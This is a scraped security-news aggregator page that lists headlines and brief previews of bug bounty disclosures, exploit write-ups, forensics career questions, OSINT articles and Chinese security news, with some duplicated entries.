    CVE-2021-38406 or CISA KEV Catalog Lacks Accountability
    Article URL: https://attackerkb.com/topics/RHuGSieFJe/cve-2021-38406 Comments URL: https://news.ycombinator.com/item?id=32689158 Points: 2 # Comments: 0
  • Open

    The best films about OSINT
    Have a nice weekend everyone… Continue reading on Medium »
  • Open

    Utkuici — Nessus Automation
    No content preview
  • Open

    Utkuici — Nessus Automation
    No content preview
  • Open

    Utkuici — Nessus Automation
    No content preview
  • Open

    Wordpress users disclosure from json and xml file
    MTN Group disclosed a bug submitted by drak3hft7: https://hackerone.com/reports/1408589
  • Open

    FreeBuf早报 | 反电信网络诈骗法表决通过;主要 VPN 服务商关闭印度服务器
    十三届全国人大常委会第三十六次会议 9 月 2 日表决通过反电信网络诈骗法,该法将于 2022 年 12 月 1 日起施行。
    FreeBuf周报 | 谷歌发布开源漏洞奖励计划;网传用友等头部软件厂商遭勒索攻击
    各位Buffer周末好,以下是本周「FreeBuf周报」,我们总结推荐了本周的热点资讯、安全事件、一周好文和省心工具,保证大家不错过本周的每一个重点!热点资讯1、DEF CON 大会:白帽黑客演示远程控制退役卫星8 月 20 日的 DEF CON 黑客大会上,白帽黑客组织 Shadyte l现场演示远程劫持一颗退役卫星,并利用它来播放电影。2、苹果曝严重安全漏洞,喜提热搜第一据媒体报道,苹果公司在
    首部!《反电信网络诈骗法》通过,12月1日起施行
    我国首部《反电信网络诈骗法》(以下简称《反诈骗法》)已于9月2日表决通过,12月1日起正式施行。
    黑山遭遇勒索软件攻击,黑客索要1000万美元
    黑山政府的关键基础设施遭到了勒索软件攻击,黑客索要 1000 万美元巨款。
    APT组织Evilnum发起新一轮针对在线交易的网络攻击
    概述近期,绿盟科技伏影实验室捕获到一系列互相关联的钓鱼攻击活动。经过分析,伏影实验室确认这些活动来自APT组织Evilnum,是该组织近期网络攻击行动DarkCasino的延续。本轮网络攻击活动发生在7月下旬至8月上旬。Evilnum攻击者在活动中继续使用其常用的攻击思路,包括pif类型和压缩包类型的诱饵文件、围绕自研木马程序DarkMe构建的攻击链、以及各式第三方工具等。DarkCasino是由
    月圆「识」好礼,惊喜词条彩蛋上线!
    今年中秋,“共建者”探险小分队,让知识变得更有趣。
  • Open

    Ruby Concurrency
    매번 어플리케이션을 만들 때면 동시성에 대한 고민을 하지 않을 수가 없습니다. 기능적인 구현에 직접 필요한 경우도 있고 퍼포먼스를 결정 지을 수 있는 요소이기 때문에 중요하다고 생각합니다. 개인적으로 대학생 때 여러가지 패턴을 배우고 프로젝트에 적용했었지만 현업 이후 부턴 보안 엔지니어링이 메인 Job이다 보니 실질적으론 Thread-pool 패턴의 사용 빈도가 압도적으로 높았던 것 같습니다. 제가 Golang은 예전에 goroutine과 sync 관련 글을 쓴 적이 있었지만 Ruby에선 따로 쓴적이 없었던 것 같네요. 오늘은 Ruby에서의 동시성 처리에 대한 이야기를 하려고 합니다. Why Gem? 오늘 작성하는 내용은 Ruby의 Concurrent-ruby 라는 Gem을 이용한 방법들입니다. 물론 Ruby 언어에서 제공하는 기능들로도 충분히 구현해서 사용할 수 있겠지만, 이는 안정성이나 보안적인 측면에서 잘 만들어진 Gem 라이브러리보다 좋을 수 없기 때문에 가급적인 라이브러리로 처리하는 것이 좋습니다. Concurrent-ruby Concurrent-ruby는 Ruby에서 동시성 처리를 위한 라이브러리입니다. 보통 많이 사용하는 Promise, Async 등의 기능과 여러가지 Thread pool(worker pool), Scheduler 같은 Concurrency pattern을 가지고 있습니다. Modern concurrency tools including agents, futures, promises, thread pools, supervisors, and more. Inspired by Erlang, Clojure, Scala, Go, Java, JavaScript, and classic concurrency patterns. Features 지원하는 기능이 많지만 추려서 정리하면 아래와 같습니다. 적절히 잘 활용한다면 직접 구현하는 것 보다 시간도 아끼고 안정성도 챙길 수 있습니다. Default Async ScheduledTask TimerTask Promises Thread-safe objects, struct, conllection, immutable object and struct Thread Synchronization 등 다수 Edge...

  • Open

    Chrome 106 Beta: New CSS Features, WebCodecs and WebXR Improvements, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, ChromeOS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 106 is beta as of September 1, 2022. You can download the latest on Google.com for desktop or on Google Play Store on Android. Origin Trials This version of Chrome supports the origin trials described below. Origin trials allow you to try new features and give feedback on usability, practicality, and effectiveness to the web standards community. To register for any of the origin trials currently supported in Chrome, including the ones described below, visit the Chrome Origin Trials dashboard. To learn more about origin trials in …
  • Open

    GCFA
    Hey everyone, I don’t interact that much besides upvoting and lurk here quite a bit. Just wanted to post that I passed my GCFA. Test was tough but glad it’s over and certificate was completed! submitted by /u/avenger_of_zendikar [link] [comments]
    Creating a File listing of all Files, Directories, and who files are shared with on Google Drive
    Does anybody have a way to do this, or the name of a forensics suite that actually does it correctly? submitted by /u/sanreisei [link] [comments]
    For forensic examiners in the US, how long do you keep images/extractions of your devices?
    I have been working digital forensics for my department for almost 4 years now. The issue I am now running into is how long to keep original images of extracted devices? I know after the investigative process the relevant evidence is exported and reported as evidence with the rest of the image being sealed away. I do seal the images into a offline HDD storage. But I am starting to max out another 8TB drive. I am asking how long people keep the original extractions or if someone can point to a policy/law that gives me some direction. Thanks in advance submitted by /u/nub_cho [link] [comments]
    ASK ALL NON-FORENSIC DATA RECOVERY QUESTIONS HERE
    This is where all non-forensic data recovery questions should be asked. Please see below for examples of non-forensic data recovery questions that are welcome as comments within this post but are NOT welcome as posts in our subreddit: My phone broke. Can you help me recover/backup my contacts and text messages? I accidently wiped my hard drive. Can you help me recover my files? I lost messages on Instagram, SnapChat, Facebook, ect. Can you help me recover them? Please note that your question is far more likely to be answered if you describe the whole context of the situation and include as many technical details as possible. One or two sentence questions (such as the ones above) are permissible but are likely to be ignored by our community members as they do not contain the information needed to answer your question. A good example of a non-forensic data recovery question that is detailed enough to be answered is listed below: "Hello. My kid was playing around on my laptop and deleted a very important Microsoft Word document that I had saved on my desktop. I checked the recycle bin and its not there. My laptop is a Dell Inspiron 15 3000 with a 256gb SSD as the main drive and has Windows 10 installed on it. Is there any advice you can give that will help me recover it?" After replying to this post with a non-forensic data recovery question, you might also want to check out r/datarecovery since that subreddit is devoted specifically to answering questions such as the ones asked in this post. submitted by /u/AutoModerator [link] [comments]
    Digital Forensics Career Path Questions
    Hello Everyone, I am from the US (PNW) and interested in getting into the Digital Forensics field. Did four years at university, didn't like it, and now I am working on a 2-year degree in IT from my local community college. In my free time, I am doing learning modules on hackthebox academy and participating in live CTF events when I can. I am curious to hear from this community about how I can get my foot in the door in this field. I do not know if what I am doing right now is the ideal path that I should follow, or should I focus my time more on specific certifications rather than CTF's competitions and cybersecurity fundamentals ? I am also wondering if it is a good idea to check with my local PD to see if they have any opportunities ? Sorry if this is too off-topic, but talking with people from this community seems to me like a great resource to learn from. Thank You. submitted by /u/abrahr1123 [link] [comments]
  • Open

    IDOR on TikTok Ads Endpoint
    TikTok disclosed a bug submitted by sinayeganeh: https://hackerone.com/reports/1527906 - Bounty: $2500
    Sensitive Information Disclosure Through Config File
    MTN Group disclosed a bug submitted by dh0pe: https://hackerone.com/reports/1397788
    Default Admin Username and Password on remedysso.mtncameroon.net
    MTN Group disclosed a bug submitted by dh0pe: https://hackerone.com/reports/1397786
    Password reset token leak on third party website via Referer header [cloudivr.mtnbusiness.com.ng]
    MTN Group disclosed a bug submitted by ibrahimatix0x01: https://hackerone.com/reports/1320242
    Remote code execution due to unvalidated file upload
    MTN Group disclosed a bug submitted by aliyugombe: https://hackerone.com/reports/1164452
    API Key reported in #1465145 not rotated and thus is still valid and can be used by anyone
    Adobe disclosed a bug submitted by aneeeketh: https://hackerone.com/reports/1591770
    Remote denial of service in HyperLedger Fabric
    Hyperledger disclosed a bug submitted by fatal0: https://hackerone.com/reports/1635854 - Bounty: $1500
    Any expired reset password link can still be used to reset the password
    Acronis disclosed a bug submitted by mrccrqr: https://hackerone.com/reports/1615790 - Bounty: $100
  • Open

    Top 5 Hacking Tools
    Let’s talk about offensive security! This article will outline some of my favorite tools for hacking into networks, establishing foothold… Continue reading on Medium »
  • Open

    [NSFW] Comic Books and Magazines (nfsw because of Heavy Metal Magazine)
    submitted by /u/SatansMoisture [link] [comments]
    Good Spongebob 100% working no virus!
    submitted by /u/Plastic_Preparation1 [link] [comments]
    Random TV shows non-https
    submitted by /u/littlepreptalk [link] [comments]
    excavators
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    What is the per case PII data breach fine in UK?
    For example 1 passport breach of someone's data is ££££ ? Personally Identifiable Information (PII) Examples. Thank you Reddit. submitted by /u/syswww [link] [comments]
  • Open

    SecWiki News 2022-09-01 Review
    代码审计之路之白盒挖掘机 by ourren 6种方法探测Cisco设备版本 by ourren 商业银行安全纵深防御体系探索与实践 by ourren 安全防御体系建设 by ourren 新型数据中心网络安全体系研究 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-09-01 Review
    代码审计之路之白盒挖掘机 by ourren 6种方法探测Cisco设备版本 by ourren 商业银行安全纵深防御体系探索与实践 by ourren 安全防御体系建设 by ourren 新型数据中心网络安全体系研究 by ourren 更多最新文章,请访问SecWiki
  • Open

    Fuzz Testing di Go
    Sebelum kita belajar lebih jauh kita perlu tau apa itu Fuzz atau Fuzzing. Fuzzing adalah salah satu teknik automated software testing yang… Continue reading on Medium »
  • Open

    Fuzz Testing di Go
    Sebelum kita belajar lebih jauh kita perlu tau apa itu Fuzz atau Fuzzing. Fuzzing adalah salah satu teknik automated software testing yang… Continue reading on Medium »
  • Open

    How To Obtain a Free Shodan Membership
    OSINT DOJO Continue reading on The Sleuth Sheet »
    OSINT Chall #3
    Write-up pour le challenge twitter @quiztime Continue reading on Medium »
    Social Media | OSINT :)
    Foller.me  https://foller.me  Basic Twitter account statistics, interactions and analytics on the last 100 tweets Continue reading on Medium »
    TryHackMe: OhSINT
    Ever wondered how the data you share on the internet could be used to extract sensitive information about you? As a proof of concept, we… Continue reading on Medium »
    Awesome OSINT
    A curated list of amazingly awesome open source intelligence tools and resources. Open-source intelligence (OSINT) is intelligence… Continue reading on Medium »
    How To Use SpiderFoot for Social Media Intelligence
    Overview Continue reading on The Sleuth Sheet »
  • Open

    GitHub - RossGeerlings/tio-ad-sync: Group Syncing between Active Directory and Tenable.io, and Automated Access Control
    submitted by /u/RossGeerlings [link] [comments]
    SETTLERS OF NETLINK: Exploiting a limited Use After Free in nf_tables (CVE-2022-32250) against the latest Ubuntu (22.04) and Linux kernel 5.15 -
    submitted by /u/digicat [link] [comments]
    How I Met Your Beacon: Detection Strategies
    submitted by /u/sanitybit [link] [comments]
  • Open

    TikTok vulnerability allows one-click account compromise
    Article URL: https://arstechnica.com/information-technology/2022/08/microsoft-finds-tiktok-vulnerability-that-allowed-one-click-account-compromises/ Comments URL: https://news.ycombinator.com/item?id=32676624 Points: 2 # Comments: 0
  • Open

    [Cullinan #41] GraphQL, Rails and Jekyll
    Cullinan 로그 #41입니다. 약 두달만에 올리는 내용 치고는 변경 사항이 많지는 않았습니다. 4개의 신규 항목 추가가 있었고, smuggling 등 일부 내용을 추가 보강했습니다. Change Logs New GraphQL Security GraphQL Injection Rails (Ruby on Rails) Jekyll Update SRI > Add tool H2C Smuggling > 코드 및 이미지 추가 HTTP Request Smuggling > CL.0 케이스 추가 앞으로? 최근에 블로그 글 및 운영 방식에 고민이 많았던지라 컬리넌 로그 또한 정리 대상에 있는 상태입니다. 기존처럼 매번 신규 포스트로 운영할지, 또는 하나의 페이지에서 CHANGE LOG 처럼 이력을 누적할지 아직 고민인데 혹시나 결정되면 내용을 한번 더 공유드릴게요 :D 그나저나 벌써 #41이군요 😮
  • Open

    应对勒索攻击如何做好数据备份?| FreeBuf甲方群话题讨论
    不同企业对数据备份采取的措施参差不齐,这其中有哪些特殊性?该如何为应对勒索攻击做好数据备份?
    FreeBuf早报 | 英国发布最严电信运营商安全规定;美民主党推动Meta分享堕胎数据
    英国电信行业的新安全框架将于 10 月生效,使英国的电信安全法规成为世界上最严格的法规之一。
    Apache两个解析漏洞复现及防御方法
    Apache多后缀解析漏洞及换行解析漏洞。
    TikTok曝高危漏洞允许一键式帐户劫持,回应称已修复
    TikTok安卓版存在一个高危漏洞,攻击者可能借此实现一键式账户劫持,影响数亿用户。
    意大利石油巨头 ENI 遭受网络攻击
    意大利石油巨头ENI 遭受网络攻击,攻击者破坏了其计算机网络,但该公司称,攻击并未产生很恶劣的影响。
    探寻安全新发展,IDC 2022 CSO全球网络安全峰会成功举办
    本次峰会以“聚力数据安全 赋能企业现代化”为主题,吸引了超过650位CIO、CSO以及CISO通过线上线下的形式参会。
    最高超过20万,谷歌发布开源漏洞奖励计划
    8月29日,谷歌推出了开源软件漏洞奖励计划 (OSS VRP),是首批特定于开源的漏洞计划之一。
    全网首篇 | 深入解读《医疗卫生机构网络安全管理办法》
    网络安全是医疗数字化的底座,网络安全基础未能夯实,医疗数字化就无法实现真正的腾飞。
  • Open

    SETTLERS OF NETLINK: Exploiting a limited Use After Free in nf_tables (CVE-2022-32250) against the latest Ubuntu (22.04) and Linux kernel 5.15
    submitted by /u/digicat [link] [comments]
  • Open

    Fuzzing with Radamsa
    No content preview
    Mass Hunting CVE’s Part-1
    No content preview
    S3 Bucket: Cloud Trail Log Analysis
    No content preview
    OAuth 2.0 (Introduction and Exploitation Part I)Explained By Hashar Mujahid
    No content preview
  • Open

    Fuzzing with Radamsa
    No content preview
    Mass Hunting CVE’s Part-1
    No content preview
    S3 Bucket: Cloud Trail Log Analysis
    No content preview
    OAuth 2.0 (Introduction and Exploitation Part I)Explained By Hashar Mujahid
    No content preview
  • Open

    Fuzzing with Radamsa
    No content preview
    Mass Hunting CVE’s Part-1
    No content preview
    S3 Bucket: Cloud Trail Log Analysis
    No content preview
    OAuth 2.0 (Introduction and Exploitation Part I)Explained By Hashar Mujahid
    No content preview
  • Open

    List of 50 cybersecurity podcasts:
    1. Cyber Work 2. Click Here 3. Defrag This 4. Security Now 5. InfoSec Real 6. InfoSec Live 7. Simply Cyber 8. OWASP Podcast 9. We Talk… Continue reading on Medium »
    24 cybersecurity newsletters to follow:
    AdvisoryWeek — Security advisory roundups by major vendors. We Live Security — Award-winning news, views and insights. CSO Online — News… Continue reading on Medium »
    Awesome OSINT
    A curated list of amazingly awesome open source intelligence tools and resources. Open-source intelligence (OSINT) is intelligence… Continue reading on Medium »
  • Open

    Hack Windows through Weak Service Permissions
    submitted by /u/Clement_Tino [link] [comments]

  • Open

    Password reset tokens sent to CSP reporting endpoints
    Snapchat disclosed a bug submitted by mahfujwhh: https://hackerone.com/reports/1626281 - Bounty: $250
    Enable 2Fa verification without verifying email leads account takeover
    Cloudflare Public Bug Bounty disclosed a bug submitted by motu-vai: https://hackerone.com/reports/1618021 - Bounty: $350
    CVE-2022-35252: control code in cookie denial of service
    curl disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1613943
    Blind SSRF on platform.dash.cloudflare.com Due to Sentry misconfiguration
    Cloudflare Public Bug Bounty disclosed a bug submitted by lohigowda: https://hackerone.com/reports/1467044 - Bounty: $200
  • Open

    A ‘high severity’ TikTok vulnerability allowed one-click account hijacking
    Article URL: https://www.theverge.com/2022/8/31/23329662/tiktok-vulnerability-microsoft-one-click-exploit-high-severity Comments URL: https://news.ycombinator.com/item?id=32669851 Points: 10 # Comments: 1
    Apple Releases iOS 12.5.6 Update for Older Devices with Vulnerability Fixes
    Article URL: https://www.macrumors.com/2022/08/31/apple-releases-ios-12-5-6/ Comments URL: https://news.ycombinator.com/item?id=32667852 Points: 1 # Comments: 0
    Vulnerability in TikTok Android app could lead to one-click account hijacking
    Article URL: https://www.microsoft.com/security/blog/2022/08/31/vulnerability-in-tiktok-android-app-could-lead-to-one-click-account-hijacking/ Comments URL: https://news.ycombinator.com/item?id=32664898 Points: 4 # Comments: 0
  • Open

    Azure DevOps Server segmentation
    Azure DevOps Server development system segmentation best practices : sergiomarotco/Azure-DevOps-Server-segmentation-cheat-sheet submitted by /u/Marotso [link] [comments]
    NSA/Gov vs Big4 job offers
    Hi everyone, I recently received two offers in cybersecurity from a big 4 company and the NSA. For starter, I am fresh out of school with a MIS degree. Initially, I agreed to go with NSA and went under investigation background check already. However, it’s been over 3 months and I still have not received a final offer and start date from them. Around a week ago, a Big4 firm offers me a position that pays $30,000 more (we’re looking at close to six figures after bonuses, on my first year). Now I am conflicted on what to do. Initially, I thought that the work with NSA would be more challenging than that of any private sector. But my friends and families are advising me otherwise. I’ve scrolled through some threats on here about GOV vs Private and most people seem to be saying the opposite of what I expect: that you get more boring work, less incentive and slower promotion with NSA. Any advice for me? Edit: to add to it, I got an internship with Big4, and they extended a full time offer after it ends. So there should be a chance I’m able to reapply for full time position with not much trouble later on. submitted by /u/Any_Career_4379 [link] [comments]
    Do you think changing an orgz TLD to .GOV is a deterrent or an incentive for the adversary?
    Any other pros/cons? submitted by /u/name1wantedwastaken [link] [comments]
  • Open

    AngularJS Client-Side Template Injection: The orderBy Filter.
    Intro: Continue reading on Medium »
    An accidental IDOR story that got me 1st acknowledgment from Nciipc
    $whoami Continue reading on Medium »
    All about CORS Misconfiguration.
    By Reading this article you suppose to learn: Continue reading on System Weakness »
    All about CORS Misconfiguration.
    By Reading this article you suppose to learn: Continue reading on Medium »
    What is API And Why It’s Important to know
    What is API? Continue reading on Medium »
    OAuth 2.0 (Introduction and Exploitation Part I)Explained By Hashar Mujahid
    In this blog, I am going to explain how OAuth 2.0 works and what vulnerabilities can be raised if it is implemented incorrectly. Continue reading on InfoSec Write-ups »
    Rotation IP Address with Burpsuite
    Hi, For those of you who are unfamiliar with what IP Rotation is, I’m going to share a quick tip and trick with you all on how to use… Continue reading on System Weakness »
    Rotation IP Address with Burpsuite
    Hi, pada kesempatan kali ini gue akan membagikan sebuah tips and trick sederhana bagi kalian semua heker-meN(Red) bagaimana caranya… Continue reading on Medium »
    ‘PTN’ infosec monthly #3— InfoSec Updates
    Namaste everyone, Welcome to ‘PTN’ infosec monthly #3. We are back with the third newsletter with infosec updates. We started ‘PTN infosec… Continue reading on Pentester Nepal »
    Saving more than 100,000 website from a Watering Hole attack
    Watering hole is a computer attack strategy in which an attacker guesses or observes which websites an organization often uses and infects… Continue reading on Medium »
    Best 26 cybersecurity: YouTube channels
    1. Infosec Institute  — Cybersecurity awareness. 2. Black Hat — Technical cybersecurity conferences. 3. Bugcrowd  — Bug bounty methodology… Continue reading on Medium »
    OWASP Risk Calculator
    OWASP Risk Rating Methodology In general terms, OWASP Risk Rating Methodology takes us through a series of steps that can use to calculate… Continue reading on Medium »
  • Open

    Maturity, Effectiveness, and Risk – Security Program Building and Business Resilience
    One of the most common questions asked by business leadership is also one of the most challenging to answer: “How secure are we?” Now, some of you reading this may already be cringing or yelling at your screen that this question on its own shouldn’t have a simple answer with little actionable value. However, when... The post Maturity, Effectiveness, and Risk – Security Program Building and Business Resilience appeared first on TrustedSec.
  • Open

    The-Listeners-Writeup
    Writeup for the The Listeners contract a Geo-Location CTF offered by tiberianorder.com Continue reading on The Sleuth Sheet »
    OPSEC for OSINT — Basics
    OPSEC stands for Operational Security. OPSEC is a set of principles to follow so that information can’t be gathered from non-involved… Continue reading on The Sleuth Sheet »
    OSINT Chall #2
    Write-up pour le challenge twitter @quiztime Continue reading on Medium »
    OSINT Chall #1
    Write-up pour le challenge twitter @quiztime Continue reading on Medium »
  • Open

    Linux Audit comes at a cost, is that where BPF steps in?
    submitted by /u/Blakebvhjjdd [link] [comments]
    MemLabs: Learn Memory Forensics through CTF-styled labs
    submitted by /u/sanitybit [link] [comments]
    Vulnerability in TikTok Android app could lead to one-click account hijacking
    submitted by /u/CyberMasterV [link] [comments]
    Open source automated AWS CIS v1.5 benchmark assessment just released by Steampipe.io
    submitted by /u/bobtbot [link] [comments]
    Announcing the Open Sourcing of Paranoid's Library - Detect well-known weaknesses in large amounts of crypto artifacts, like public keys and digital signatures
    submitted by /u/_rs [link] [comments]
    Restricting Libraries in JVM Compute Platforms - Security challenges with Scala and Java libraries
    submitted by /u/_rs [link] [comments]
    From Onboarding to Offboarding - Securing GitHub Apps Integration
    submitted by /u/Hefty_Knowledge_7449 [link] [comments]
    CVE-2021-38297 - Technical analysis of a Go WebAssembly vulnerability
    submitted by /u/SRMish3 [link] [comments]
    Digging into an NTLM Downgrade Attack
    submitted by /u/0xdea [link] [comments]
    MATE: Interactive Program Analysis with Code Property Graphs
    submitted by /u/sanitybit [link] [comments]
  • Open

    Fuzzing Go APIs for SQL Injection
    Article URL: https://blog.fuzzbuzz.io/fuzzing-go-apis-for-sql-injection/ Comments URL: https://news.ycombinator.com/item?id=32664270 Points: 57 # Comments: 18
    Open-source fuzzer Jazzer.js brings fuzzing to JavaScript
    Article URL: https://www.code-intelligence.com/blog/jazzer.js Comments URL: https://news.ycombinator.com/item?id=32659564 Points: 1 # Comments: 1
  • Open

    SecWiki News 2022-08-31 Review
    证券行业应用安全架构设计实践 by ourren Windows域内横向渗透实例 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-31 Review
    证券行业应用安全架构设计实践 by ourren Windows域内横向渗透实例 by ourren 更多最新文章,请访问SecWiki
  • Open

    mfa bypass in private program, the abdulsec way
    No content preview
  • Open

    mfa bypass in private program, the abdulsec way
    No content preview
  • Open

    mfa bypass in private program, the abdulsec way
    No content preview
  • Open

    如何使用Rekono结合多种工具自动完成渗透测试
    该工具能够结合其他多种网络安全工具并以自动化的形式完成整个渗透测试过程。
    toxssin:一款功能强大的XSS漏洞扫描利用和Payload生成工具
    这款渗透测试工具能够帮助广大研究人员自动扫描、检测和利用跨站脚本XSS漏洞。
    FreeBuf早报 | 谷歌推出开源软件漏洞赏金计划;美国CISO年薪中位数近100万美元
    2022年,美国CISO的总薪酬中位数(包括年化股权和长期激励措施)从93.6万美元增加到97.1万美元。
    影响750万用户,俄流媒体平台“START”已公开承认
    START平台的管理员称,黑客从公司系统中窃取了2021 年的数据库,目前正在在线分发样本。
    黑客利用天文望远镜拍摄的图像传播恶意软件
    该恶意软件由 Golang 编写,利用詹姆斯韦伯望远镜的空间图像来传播恶意软件。
    FreeBuf甲方社群直播大放送
    FreeBuf甲方社群 | 社群直播系列回顾【持续更新中】
  • Open

    What's a typical day in the life of a Digital Forensics expert in law enforcement?
    Hi everyone. I'm applying for a Digital Forensics expert position at a law enforcement agency in Europe. In this agency, DF experts are sworn officers and have training at the academy like any other officer (although the focus is more on forensics). After the academy they are assigned to specific positions and career paths that differ from that of regular LE officers/agents. Does anyone have a similar experience and can explain a typical day in the life of a DF expert? submitted by /u/InfoSecSensei [link] [comments]
    I need activity history from my security cameras
    Someone logged into my accounts and deleted both my ring camera footage and blink camera footage on a particular day. To my understanding, when the footage is gone it can’t be recovered unless subpoenaed however anything related to the time it was deleted or from where would help. This is non negotiable. thanks submitted by /u/OKsaving612 [link] [comments]
    What entry level jobs did anyone start out with?
    This field is harder to break into than Cyber Security itself. The closest thing I found was literally a malware analyst position where I can use forensic related tools but I can’t find anything on Handshake for students that have anything to do with computer forensic’s. submitted by /u/OhmyMary [link] [comments]
  • Open

    【漏洞通报】GitLab CE/EE 远程命令执行漏洞(CVE-2022-299...
    在 GitLab 中发现了一个关键问题,该问题影响15.1.6前、从15.2 到15.2.4以及从 15.3 到 15.3.2 的所有版本,该漏洞允许经过身份验证的用户通过GitHub 导入功能远...
  • Open

    【漏洞通报】GitLab CE/EE 远程命令执行漏洞(CVE-2022-299...
    在 GitLab 中发现了一个关键问题,该问题影响15.1.6前、从15.2 到15.2.4以及从 15.3 到 15.3.2 的所有版本,该漏洞允许经过身份验证的用户通过GitHub 导入功能远...
  • Open

    Burp Suite price increases
    We are increasing prices for Burp Suite Professional and Burp Suite Enterprise Edition, due to a significant increase in costs caused by global inflation. The price of an annual Burp Suite Professiona
  • Open

    Burp Suite price increases
    We are increasing prices for Burp Suite Professional and Burp Suite Enterprise Edition, due to a significant increase in costs caused by global inflation. The price of an annual Burp Suite Professiona
  • Open

    WinAPI and P/Invoke in C#
    Covers how you can use WinAPI in C# for red team tooling. https://crypt0ace.github.io/posts/WinAPI-and-PInvoke-in-CSharp/ submitted by /u/Potential_Waltz7400 [link] [comments]
  • Open

    movie posters
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    基于深度学习的主机操作系统识别
    作者:三牛@墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/A6lFJMapxfPZJF6TCKLcKQ 无论从网络安全的攻击或是防护视角,信息的采集和甄别都至关重要,其中主机的系统类型是关键出发点。在以往经验中,根据操作系统类型往往能够大致判断其存在的风险点及风险类型,因此,识别主机操作系统类型对系统网络安全防护具有极其重要的意义。 操作系统识别...
  • Open

    基于深度学习的主机操作系统识别
    作者:三牛@墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/A6lFJMapxfPZJF6TCKLcKQ 无论从网络安全的攻击或是防护视角,信息的采集和甄别都至关重要,其中主机的系统类型是关键出发点。在以往经验中,根据操作系统类型往往能够大致判断其存在的风险点及风险类型,因此,识别主机操作系统类型对系统网络安全防护具有极其重要的意义。 操作系统识别...

  • Open

    Microsoft ports Windows SymCrypt to Linux, bringing a FIPS certified drop-in module to OpenSSL
    submitted by /u/sanitybit [link] [comments]
    Announcing Google’s Open Source Software Vulnerability Rewards Program
    submitted by /u/sanitybit [link] [comments]
    Snakes on a Domain: An Analysis of a Python Malware Loader
    submitted by /u/sanitybit [link] [comments]
    reinschauer - A PoC to remotely control Windows machines over Websockets.
    submitted by /u/sanitybit [link] [comments]
    Going Atomic: The Strengths and Weaknesses of a Technique-centric Purple Teaming Approach
    submitted by /u/sanitybit [link] [comments]
    Bootkitting Windows Sandbox
    submitted by /u/mrexodia [link] [comments]
    hashcathelper: Convenience tool for hashcat - crack NT hashes by taking LM hashes into account; generate analytics for cracked passwords; visualize "SamePassword" clusters in Bloodhound
    submitted by /u/0xfffffg [link] [comments]
    CVE-2022-26113: FortiClient Arbitrary File Write As SYSTEM
    submitted by /u/hackers_and_builders [link] [comments]
    Write-up of N-day exploit for CVE-2022-2586: Linux kernel nft_object UAF
    submitted by /u/gid0rah [link] [comments]
    Truth Behind the Celer Network cBridge cross-chain bridge incident: BGP hijacking
    submitted by /u/sanitybit [link] [comments]
    Tetsuji: Remote Code Execution on a GameBoy Colour 22 Years Later
    submitted by /u/sanitybit [link] [comments]
    Incident Response in AWS
    submitted by /u/sanitybit [link] [comments]
  • Open

    İstihbarat ve Siber İstihbarat Üzerine Notlar
    Siber istihbarat konusunda yeni bilgiler öğrenerek kendimi geliştirmek için bulabildiğim kaynaklar ile çalışmalar yapmaktayım. Çalıştığım… Continue reading on Medium »
  • Open

    What is a Forensics Consulting job like?
    Hello all, I've been studying DFIR for years and I'm in Incident Response nowadays. I have been picturing myself becoming a consultant for DFIR because I've spent quite a bit of time working indirectly with consultants of other fields and I've seen how they are able to work hard for a few months and make enough money that they can then just stop working until the next job comes along. My question is whether that is actually what consulting looks like anywhere in DFIR and if not what does it look like? I know I would have to continue to keep up with learning either way and I'm not looking for something easy. I just love the idea of dedicating myself to something worthwhile while being able to take time off in between. For some background, I have a chance to move into a dedicated forensics position at my current company and the only hang up is that I'd be going from fully remote to fully in office or maybe hybrid so I'm trying to figure out how much I want to sacrifice for the sake of career advancement and where that can take me is a huge factor. submitted by /u/drfantabulo [link] [comments]
    Leading Digital Forensics Graduate Programs?
    Hey everyone, I'm looking to get my masters in digital forensics all online. I currently have a BA in Cybersecurity and two minor degrees, one in computer forensics and one in IT! One program I found that I'm interested in is Michigan State Universities cybercrime and digital investigations masters, but I want to know what the highly regarded colleges are incase they can give me a better education. Any help is appreciated since this seems like a harder masters to find for larger institutions. Before asking here I checked on r/netsec and the Academic Program threads I found are all 3+ years old that the FAQ here asks you to check first. Thank you! submitted by /u/Cyberqtea [link] [comments]
    imaging missing folder
    Hi yall, I'm trying to acquire an aws snapshot but when I do the acquisiton I see that there is at least one folder missing. I have the snapshot unmounted and I used dcfldd and ftkimager and neither are able to get the folder I need. For reference, I'm trying to acquire a web server and the folder I need is the website within the user s home directory. The folder isn't a symbolic link so om looking in the right place. I'm very confused. Any ideas? submitted by /u/shonen787 [link] [comments]
    IT Technician looking to move to the Digital Forensics world
    TLDR: I would like to get an entry level certificate in digital forensics, but I don't know where to start. I need your suggestions. I currently work as a level 1 Data center technician. I only work with hardware but I have some Linuy knowledge I gained on my free time. I would like to start a career in the digital forensics world. I remember taking a course a long time ago about using apps to investigate device owned by criminals and creating chain of custody. I don't remember anything from that course, but I remember enjoying it at the time and I am wondering if there is an entry level certificate for something like that. Edit: is there such a certificate focus on phones? submitted by /u/Lostinsssst [link] [comments]
    Malware analyst intern should I apply?
    Hey there is this internship for a malware analyst intern and cyber threats that says on handshake km qualified for but I have no cyber security experience just computer forensics. Haven’t done any Cyber Security work but I’d as a intern I need to have some understanding how to detect malware. Should I apply to this position? For $15/hr I figure also for low pay it can’t be that bad but I’m skeptical if it’s right for me? submitted by /u/OhmyMary [link] [comments]
  • Open

    Abusing Open Redirects to get an Account Takeover
    It was the end of another semester, and I was really bored, so decided to take a look at the system that my college uses to store and… Continue reading on Medium »
    Blind SSRF due to img tag injection in page form
    Today we’re going to talk about SSRF attack that allows hackers to send any network requests from the back-end server by using tags. Continue reading on Medium »
    Let’s hack websites and make money!
    Without the jail time. lol Continue reading on Medium »
    My findings on Hack U.S Program
    hello everyone myself charan (also know as falcon_319) in bug bounty community and i am occasional bug bounty hunter and agriculture… Continue reading on Medium »
    SSRF — Exploitation 02
    Successful Cyberattacks often start at the “Network Perimeter”. Continue reading on InfoSec Write-ups »
